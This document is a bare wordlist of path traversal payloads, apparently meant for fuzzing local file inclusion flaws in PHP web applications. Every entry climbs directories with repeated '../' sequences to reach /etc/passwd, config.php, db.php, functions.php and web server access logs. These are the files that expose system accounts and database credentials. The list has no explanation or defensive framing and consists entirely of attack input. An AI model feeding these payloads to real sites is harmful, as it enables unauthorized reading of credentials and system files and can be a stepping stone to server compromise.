/index.php
../index.php
../../index.php
../../../index.php
../../../../index.php
../../../../../index.php
../../../../../../index.php
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
functions.php
../functions.php
../../functions.php
../../../functions.php
../../../../functions.php
../../../../../functions.php
../../../../../../functions.php
config.php
../config.php
../../config.php
../../../config.php
../../../../config.php
../../../../../config.php
../../../../../../config.php
con.php
../con.php
../../con.php
../../../con.php
../../../../con.php
../../../../../con.php
../../../../../../con.php
db.php
../db.php
../../db.php
../../../db.php
../../../../db.php
../../../../../db.php
../../../../../../db.php
/includes/functions.php
../includes/functions.php
../../includes/functions.php
../../../includes/functions.php
../../../../includes/functions.php
../../../../../includes/functions.php
/include/config.php
../include/config.php
../../include/config.php
../../../include/config.php
../../../../include/config.php
../../../../../include/config.php
/logs/acces_log
../logs/acces_log
../../logs/acces_log
../../../logs/acces_log
../../../../logs/acces_log
../../../../../logs/acces_log
../../../../../../logs/acces_log
../../../../../../../logs/acces_log
../../../../../../../../logs/acces_log
